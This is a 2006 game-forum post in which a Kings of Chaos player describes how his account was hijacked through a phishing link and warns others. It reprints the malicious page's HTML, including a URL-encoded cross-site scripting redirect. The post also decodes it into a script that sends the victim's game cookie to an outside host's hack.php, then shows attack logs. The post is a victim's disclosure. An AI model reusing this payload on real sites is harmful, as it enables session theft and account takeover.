Post by neo139 on Feb 17, 2006 19:17:11 GMT 2
(read the entery message after post reply)
hi, i recive a message with a like, i (fool) open it and my account got sold off
RobbingHoods None 7 hours ago
-------------------
Hello are you looking for officers?
Im looking for a commander.
If your interested go to the forum and fill out the application.
Im a seasoned veteran playing since age 2 and have just recently restarted.
Im looking for someone who can let me join them as an officer, that way when I use a recruiter the soldiers are not wasted.
So if your interested go to our forums.
*t*p://s**.inv*sio*free*com/k*callia*ce (edited, i put *, for security)
-------------------
www.kingsofchaos.com/stats.php?id=3331693 <-- that is the Id of the man that sent me the message, but he deleted his
account
-----------
also i have downloaded the html code of "*t*p://s**.inv*sio*free*com/k*callia*ce" this url
here it is
----------------------------------------------
-----------------------------------------------------
-------------------------------------------------
as you can see here is the part of the script that hack you
if you decoded you will get this
it use your cookie
--------
--------------------------------
also here is the code of hack.php
Nu esti norocos :-)<!-- T35 Hosting Ad Code Begin -->
i wish i could have the php code but that is imposible
-------------------
--------------
one point is missing
who catch my sell off?
yeah, you saw it, powershot, he attack me, one second after i enter the page
but there is something more strange about it... powershot have no-weapons
so where is the money??
my user is Neo139
other point mising!
----------------
-----------------
that man sent me that message, i thought "ok, if you see a sell off you go for it, why that man apologyse"
so i went to check my outbox
and see this
-----
-----
i never sent that message, so i check the other page of the outbox and
the same message that i recived was sent to 20 ramdom users (i already sent the 20 users a message to tell not to open that link and delete the message)
all at the same time i click the link!!!
i check the "Previous Logins", but none login, just me, so all this "sell off, sent pms etc" was with javascript!!!!
and also they can pass the captcha script!!!!!
so "RobbingHoods" is not the guy that started all this, is just other fool like me that open that link
so... the ID "325567" is just the default person to spam, that person must not be banned, is just other koc user
---------
so... who must be banned?? only koc admins know (check the attacklog of PowerShot)
------------
by Neo139
the one and only (fool)
hi, i recive a message with a like, i (fool) open it and my account got sold off
RobbingHoods None 7 hours ago
-------------------
Hello are you looking for officers?
Im looking for a commander.
If your interested go to the forum and fill out the application.
Im a seasoned veteran playing since age 2 and have just recently restarted.
Im looking for someone who can let me join them as an officer, that way when I use a recruiter the soldiers are not wasted.
So if your interested go to our forums.
*t*p://s**.inv*sio*free*com/k*callia*ce (edited, i put *, for security)
-------------------
www.kingsofchaos.com/stats.php?id=3331693 <-- that is the Id of the man that sent me the message, but he deleted his
account
-----------
also i have downloaded the html code of "*t*p://s**.inv*sio*free*com/k*callia*ce" this url
here it is
<html><head><title>Kocalliance</title>
<style type='text/css'>
html { overflow-x: hidden; overflow-y: auto; }
form { display:inline; }
img { vertical-align:middle; border:0px }
BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #000; margin:0px 10px 0px
10px;background-color:#FFF }
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #000; }
a:link, a:visited, a:active { text-decoration: underline; color: #000 }
a:hover { color: #465584; text-decoration:underline }
fieldset.search { padding:6px; line-height:150% }
label { cursor:pointer; }
img.attach { border:2px outset #EEF2F7;padding:2px }
.googleroot { padding:6px; line-height:130% }
.googlechild { padding:6px; margin-left:30px; line-height:130% }
.googlebottom, .googlebottom a:link, .googlebottom a:visited, .googlebottom a:active { font-size:11px; color: #3A4F6C; }
.googlish, .googlish a:link, .googlish a:visited, .googlish a:active { font-size:14px; font-weight:bold; color:#00D; }
.googlepagelinks { font-size:1.1em; letter-spacing:1px }
.googlesmall, .googlesmall a:link, .googlesmall a:active, .googlesmall a:visited { font-size:10px; color:#434951 }
li.helprow { padding:0px; margin:0px 0px 10px 0px }
ul#help { padding:0px 0px 0px 15px }
option.cat { font-weight:bold; }
option.sub { font-weight:bold;color:#555 }
.caldate { text-align:right;font-weight:bold;font-size:11px;color:#777;background-color:#DFE6EF;padding:4px;margin:0px }
.warngood { color:green }
.warnbad { color:red }
#padandcenter { margin-left:auto;margin-right:auto;text-align:center;padding:14px 0px 14px 0px }
#profilename { font-size:28px; font-weight:bold; }
#calendarname { font-size:22px; font-weight:bold; }
#photowrap { padding:6px; }
#phototitle { font-size:24px; border-bottom:1px solid black }
#photoimg { text-align:center; margin-top:15px }
#ucpmenu { line-height:150%;width:22%; border:1px solid #345487;background-color: #F5F9FD }
#ucpmenu p { padding:2px 5px 6px 9px;margin:0px; }
#ucpcontent { background-color: #F5F9FD; border:1px solid #345487;line-height:150%; width:auto }
#ucpcontent p { padding:10px;margin:0px; }
#ipsbanner { position:absolute;top:1px;right:5%; }
#logostrip { border:1px solid #345487;background-color:
#3860BB;background-image:url([url]http://67.18.37.18/style_images/1/tile_back.gif[/url]);padding:0px;margin:0px; }
#submenu { border:1px solid #BCD0ED;background-color: #DFE6EF;font-size:10px;margin:3px 0px 3px
0px;color:#3A4F6C;font-weight:bold;}
#submenu a:link, #submenu a:visited, #submenu a:active { font-weight:bold;font-size:10px;text-decoration: none; color:
#3A4F6C; }
#userlinks { border:1px solid #C2CFDF; background-color: #F0F5FA }
#navstrip { font-weight:bold;padding:6px 0px 6px 0px; }
.activeuserstrip { background-color:#BCD0ED; padding:6px }
.pformstrip { background-color: #D1DCEB; color:#3A4F6C;font-weight:bold;padding:7px;margin-top:1px }
.pformleft { background-color: #F5F9FD; padding:6px; margin-top:1px;width:25%; border-top:1px solid #C2CFDF;
border-right:1px solid #C2CFDF; }
.pformleftw { background-color: #F5F9FD; padding:6px; margin-top:1px;width:40%; border-top:1px solid #C2CFDF;
border-right:1px solid #C2CFDF; }
.pformright { background-color: #F5F9FD; padding:6px; margin-top:1px;border-top:1px solid #C2CFDF; }
.post1 { background-color: #F5F9FD }
.post2 { background-color: #EEF2F7 }
.postlinksbar { background-color:#D1DCEB;padding:7px;margin-top:1px;font-size:10px; background-image:
url([url]http://67.18.37.18/style_images/1/tile_sub.gif[/url]) }
.row1 { background-color: #F5F9FD }
.row2 { background-color: #DFE6EF }
.row3 { background-color: #EEF2F7 }
.row4 { background-color: #E4EAF2 }
.darkrow1 { background-color: #C2CFDF; color:#4C77B6; }
.darkrow2 { background-color: #BCD0ED; color:#3A4F6C; }
.darkrow3 { background-color: #D1DCEB; color:#3A4F6C; }
.hlight { background-color: #DFE6EF }
.dlight { background-color: #EEF2F7 }
.titlemedium { font-weight:bold; color:#3A4F6C; padding:7px; margin:0px; background-image:
url([url]http://67.18.37.18/style_images/1/tile_sub.gif[/url]) }
.titlemedium a:link, .titlemedium a:visited, .titlemedium a:active { text-decoration: underline; color: #3A4F6C }
.maintitle { vertical-align:middle;font-weight:bold; color:#FFF; letter-spacing:1px; padding:8px 0px 8px 5px;
background-image: url([url]http://67.18.37.18/style_images/1/tile_back.gif[/url]) }
.maintitle a:link, .maintitle a:visited, .maintitle a:active { text-decoration: none; color: #FFF }
.maintitle a:hover { text-decoration: underline }
.plainborder { border:1px solid #345487;background-color:#F5F9FD }
.tableborder { border:1px solid #345487;background-color:#FFF; padding:0px; margin:0px; width:100% }
.tablefill { border:1px solid #345487;background-color:#F5F9FD;padding:6px; }
.tablepad { background-color:#F5F9FD;padding:6px }
.tablebasic { width:100%; padding:0px 0px 0px 0px; margin:0px; border:0px }
.wrapmini { float:left;line-height:1.5em;width:25% }
.pagelinks { float:left;line-height:1.2em;width:35% }
.desc { font-size:10px; color:#434951 }
.edit { font-size: 9px }
.signature { font-size: 10px; color: #339 }
.postdetails { font-size: 10px }
.postcolor { font-size: 12px; line-height: 160% }
.normalname { font-size: 12px; font-weight: bold; color: #003 }
.normalname a:link, .normalname a:visited, .normalname a:active { font-size: 12px }
.unreg { font-size: 11px; font-weight: bold; color: #900 }
.searchlite { font-weight:bold; color:#F00; background-color:#FF0 }
#QUOTE { font-family: Verdana, Arial; font-size: 11px; color: #465584; background-color: #FAFCFE; border: 1px solid #000;
padding-top: 2px; padding-right: 2px; padding-bottom: 2px; padding-left: 2px }
#CODE { font-family: Courier, Courier New, Verdana, Arial; font-size: 11px; color: #465584; background-color: #FAFCFE;
border: 1px solid #000; padding-top: 2px; padding-right: 2px; padding-bottom: 2px; padding-left: 2px }
.copyright { font-family: Verdana, Tahoma, Arial, Sans-Serif; font-size: 9px; line-height: 12px }
.codebuttons { font-size: 10px; font-family: verdana, helvetica, sans-serif; vertical-align: middle }
.forminput, .textinput, .radiobutton, .checkbox { font-size: 11px; font-family: verdana, helvetica, sans-serif;
vertical-align: middle }
.thin { padding:6px 0px 6px 0px;line-height:140%;margin:2px 0px 2px 0px;border-top:1px solid #FFF;border-bottom:1px solid
#FFF }
.purple { color:purple;font-weight:bold }
.red { color:red;font-weight:bold }
.green { color:green;font-weight:bold }
.blue { color:blue;font-weight:bold }
.orange { color:#F90;font-weight:bold }
</style>
<base href="127.0.0.1"
/><script>document.location.replace('http://www.kingsofchaos.com/writemail.php?to=3255567&subject=%22%3E%3C%73%63%72%69%70%74
%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%27%68%74%74%70%3A%2F%2F%73%61%63%72%69%66%3
1%33%2E%74%33%35%2E%63%6F%6D%2F%68%61%63%6B%2E%70%68%70%3F%63%3D%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%73%75%
62%73%74%72%69%6E%67%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%6B%6F%63%22%29%2C%31%30%30
%30%29%29%3B%3C%2F%73%63%72%69%70%74%3E');</script></head><body bgcolor="#FFFFFF" leftmargin="0" topmargin="0"
marginwidth="0" marginheight="0" alink="#000000" vlink="#000000">
<script language='JavaScript' type="text/javascript">
<!--
function buddy_pop() {
window.open('index.php?act=buddy&','BrowserBuddy','width=250,height=500,resizable=yes,scrol
lbars=yes'); }
function multi_page_jump( url_bit, total_posts, per_page )
{
pages = 1; cur_st = parseInt(""); cur_page = 1;
if ( total_posts % per_page == 0 ) { pages = total_posts / per_page; }
else { pages = Math.ceil( total_posts / per_page ); }
msg = "Please enter a page number to jump to between 1 and" + " " + pages;
if ( cur_st > 0 ) { cur_page = cur_st / per_page; cur_page = cur_page -1; }
show_page = 1;
if ( cur_page < pages ) { show_page = cur_page + 1; }
if ( cur_page >= pages ) { show_page = cur_page - 1; }
else { show_page = cur_page + 1; }
userPage = prompt( msg, show_page );
if ( userPage > 0 ) {
if ( userPage < 1 ) { userPage = 1; }
if ( userPage > pages ) { userPage = pages; }
if ( userPage == 1 ) { start = 0; }
else { start = (userPage - 1) * per_page; }
window.location = url_bit + "&st=" + start;
}
}
//-->
</script>
<!--IBF.BANNER-->
<div id='logostrip'>
<a href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;' title='Board Home'><img
src='http://67.18.37.14/style_images/1/logo4.gif' alt='' border='0' /></a>
</div>
<!-- IE6/Win TABLE FIX -->
<table width="100%" cellspacing="6" id="submenu">
<tr>
<td><a href=''></a> · <a
href="*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=site">Portal</a></td>
<td align="right">
<img src="http://69.93.183.37/style_images/1/atb_help.gif" border="0" alt="" /> <a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Help'>Help</a>
<img src="http://69.93.183.37/style_images/1/atb_search.gif" border="0" alt="" /> <a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Search&f='>Search</a>
<img src="http://69.93.183.37/style_images/1/atb_members.gif" border="0" alt="" /> <a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Members'>Members</a>
<img src="http://69.93.183.37/style_images/1/atb_calendar.gif" border="0" alt="" /> <a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=calendar'>Calendar</a>
<!--IBF.CHATLINK-->
</td>
</tr>
</table>
<div align='center' style='margin-bottom:3px;'><div align="center" style="margin-bottom:3px;"><div class="row4"><script
type="text/javascript"><!--
google_ad_client = "pub-2404175891811072";
google_alternate_ad_url = "http://www.invisionfree.com/files/index.php?bg=E4EAF2&txt=434951&link=000000";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_channel ="1835769090";
google_color_border = "E4EAF2";
google_color_bg = "E4EAF2";
google_color_link = "000000";
google_color_url = "000000";
google_color_text = "434951";
google_page_url = document.location;
//--></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script><br /><script type="text/javascript"><!--
google_ad_client = "pub-2404175891811072";
google_ad_width = 728;
google_ad_height = 15;
google_ad_format = "728x15_0ads_al_s";
google_ad_channel ="6089240242";
google_color_border = "E4EAF2";
google_color_bg = "E4EAF2";
google_color_link = "000000";
google_color_url = "000000";
google_color_text = "434951";
google_page_url = document.location;
google_alternate_color = "E4EAF2";
//--></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></div></div></div>
<table width="100%" id="userlinks" cellspacing="6">
<tr>
<td>Welcome Guest ( <a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Login&CODE=00'>Log
In</a> | <a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Reg&CODE=00'>Register<
/a> )</td>
<td align='right'><a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Reg&CODE=reval'>Resend
Validation Email</a></td>
</tr>
</table>
<br />
<div id='navstrip' align='left'><img src='http://67.18.37.14/style_images/1/nav.gif' border='0' alt=''> <a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=idx'>Kocalliance</a></div>
<br />
<div align='left' style='text-align:left;padding-bottom:4px'>
<!-- IBF.NEWSLINK -->Welcome back; your last visit was on Feb 16 2006, 11:47 PM
</div> <!-- Board Stats -->
<form style='display:inline'
action="*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Login&CODE=01&Co
okieDate=1" method="post">
<div align='right'><strong>Quick Log In</strong>
<input type="text" class="forminput" size="10" name="UserName" onfocus="this.value=''" value="User Name" />
<input type='password' class='forminput' size='10' name='PassWord' onfocus="this.value=''" value='ibfrules' />
<input type='submit' class='forminput' value='Go' />
</div>
</form>
<br />
<div align='center'>
<a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Stats&CODE=leaders'>Th
e moderating team</a> |
<a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Search&CODE=getactive'
>Today's active topics</a> |
<a href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Stats'>Today's
top 10 posters</a> |
<a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Members&max_results=10
&sort_key=posts&sort_order=desc'>Overall top 10 posters</a>
</div>
<br />
<div class="tableborder">
<div class="maintitle">Board Statistics</div>
<table cellpadding='4' cellspacing='1' border='0' width='100%'> <tr>
<td class='pformstrip' colspan='2'>2 user(s) active in the past 15 minutes</td>
</tr>
<tr>
<td width="5%" class='row2'><img src='http://67.18.37.14/style_images/1/user.gif' border='0' alt=''></td>
<td class='row4' width='95%'>
<b>2</b> guests, <b>0</b> members, <b>0</b> anonymous members
<div class='thin'></div>
Show detailed list by: <a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Online&CODE=listall&am
p;sort_key=click'>Last Click</a>, <a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Online&CODE=listall&am
p;sort_key=name&sort_order=asc&show_mem=reg'>Member Name</a>
</td>
</tr> <tr>
<td class='pformstrip' colspan='2'>Today's Birthdays</td>
</tr>
<tr>
<td class='row2' width='5%' valign='middle'><img src='http://67.18.37.14/style_images/1/user.gif' border='0'
alt=''></td>
<td class='row4' width='95%'><b></b> No members are celebrating a birthday today<br /></td>
</tr> <tr>
<td class='pformstrip' colspan='2'>Board Statistics</td>
</tr>
<tr>
<td class='row2' width='5%' valign='middle'><img src='http://67.18.37.14/style_images/1/stats.gif' border='0'
alt=''></td>
<td class='row4' width="95%" align='left'>Our members have made a total of <b>0</b> posts<br />We have <b>1</b>
registered members<br />The newest member is <b><a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;showuser=1'>user</a></b><br
/>Most users ever online was <b>9</b> on <b>Feb 15 2006, 10:48 PM</b></td>
</tr> </table>
</div>
<!-- Board Stats --> <br />
<div align='right'><a
href="*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Login&CODE=06">Delete
cookies set by this board</a> · <a
href="*t*p://s**.inv*sio*free*com/k*callia*ce/index.php?amp;act=Login&CODE=05">Mark
all posts as read</a></div><br /><div align='center' class='row4' style='border:1px solid #345487; font-size: 7.5pt;
line-height: 12px'>Hosted for free by <a href='http://invisionfree.com' target='_blank'>InvisionFree</a> (<a
href='http://invisionfree.com/index.php?p=tou'>Terms of Use: Updated 7/7/05</a>) | Powered by <a
href="http://www.invisionboard.com" target='_blank'>Invision Power Board</a> v1.3 Final © 2003 <a
href='http://www.invisionpower.com' target='_blank'>IPS, Inc.</a><br />Page creation time: <b>0.0326</b> seconds | <a
href='*t*p://s**.inv*sio*free*com/k*callia*ce/ar/'>Archive</a></div></body></html>
----------------------------------------------
-----------------------------------------------------
-------------------------------------------------
as you can see here is the part of the script that hack you
<script>document.location.replace('http://www.kingsofchaos.com/writemail.php?to=3255567&subject=%22%3E%3C%73%63%72%69%70%74%3
E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%27%68%74%74%70%3A%2F%2F%73%61%63%72%69%66%31%
33%2E%74%33%35%2E%63%6F%6D%2F%68%61%63%6B%2E%70%68%70%3F%63%3D%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%73%75%62
%73%74%72%69%6E%67%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%6B%6F%63%22%29%2C%31%30%30%3
0%29%29%3B%3C%2F%73%63%72%69%70%74%3E');</script>
(also ban that ID 325567)
%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%27%68%74%74%70%3
A%2F%2F%73%61%63%72%69%66%31%33%2E%74%33%35%2E%63%6F%6D%2F%68%61%63%6B%2E%70%68%70%3F%63%3D%27%2B%64%6F%63%75%6D%65%6E%74%2E%
63%6F%6F%6B%69%65%2E%73%75%62%73%74%72%69%6E%67%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22
%6B%6F%63%22%29%2C%31%30%30%30%29%29%3B%3C%2F%73%63%72%69%70%74%3E
so that seems very strange!!, but no, its just URL code! very simpleif you decoded you will get this
"><script>document.location.replace('http://sacrif13.t35.com/hack.php?c='+document.cookie.substring(document.cookie.indexOf("
koc"),1000));</script>
yeah, what you saw,it use your cookie
--------
--------------------------------
also here is the code of hack.php
Nu esti norocos :-)<!-- T35 Hosting Ad Code Begin -->
<script type='text/javascript' src='/pop.js'>
<br /><a target="_blank" href="http://www.t35.com"><img border="0" src="http://freehostcp.t35.com/t35.gif" width="20"
height="20" align="right" alt="Proudly Hosted by T35 Hosting!"></a>
<!-- Start of StatCounter Code -->
<a href="http://www.statcounter.com/" target="_blank"><img
src="http://c11.statcounter.com/counter.php?sc_project=1120767&java=0&security=78e6f3a5&invisible=1" alt="best
website stats" border="0"></a>
<!-- End of StatCounter Code -->
<!-- T35 Hosting Ad Code End -->
i wish i could have the php code but that is imposible
-------------------
--------------
one point is missing
who catch my sell off?
3 minutes ago DL-Neurus 6,674,719 Gold stolen 15 0 1,376 87,474,192 890,231
details
4 minutes ago DL-Neurus 40,147,296 Gold stolen 15 0 1,905 97,151,600 1,247,298
details
13 minutes ago soryu217 91,507,229 Gold stolen 15 0 118 35,232,845 335,235
details
13 minutes ago soryu217 5,956,824 Gold stolen 1 0 261 38,144,546 381,682
details
14 minutes ago soryu217 356,494,111 Gold stolen 15 0 161 39,392,084 330,076
details
14 minutes ago soryu217 30,947,997 Gold stolen 1 0 204 43,160,053 357,521
details
14 minutes ago PowerShot 1,187,135,044 Gold stolen 15 7 311 1,788,547 377,653
details
15 minutes ago PowerShot 1,504,169,768 Gold stolen 15 6 209 1,439,418 370,966
details
15 minutes ago PowerShot 4,802,381,515 Gold stolen 15 5 211 1,665,054 389,751
details
yeah, you saw it, powershot, he attack me, one second after i enter the page
but there is something more strange about it... powershot have no-weapons
so where is the money??
my user is Neo139
other point mising!
----------------
soryu217 Re: 20 minutes ago
Sorry. it was too tempting
-----------------
that man sent me that message, i thought "ok, if you see a sell off you go for it, why that man apologyse"
so i went to check my outbox
and see this
-----
soryu217 None 8 hours ago yes
you ****
-----
i never sent that message, so i check the other page of the outbox and
the same message that i recived was sent to 20 ramdom users (i already sent the 20 users a message to tell not to open that link and delete the message)
all at the same time i click the link!!!
i check the "Previous Logins", but none login, just me, so all this "sell off, sent pms etc" was with javascript!!!!
and also they can pass the captcha script!!!!!
so "RobbingHoods" is not the guy that started all this, is just other fool like me that open that link
so... the ID "325567" is just the default person to spam, that person must not be banned, is just other koc user
---------
so... who must be banned?? only koc admins know (check the attacklog of PowerShot)
------------
by Neo139
the one and only (fool)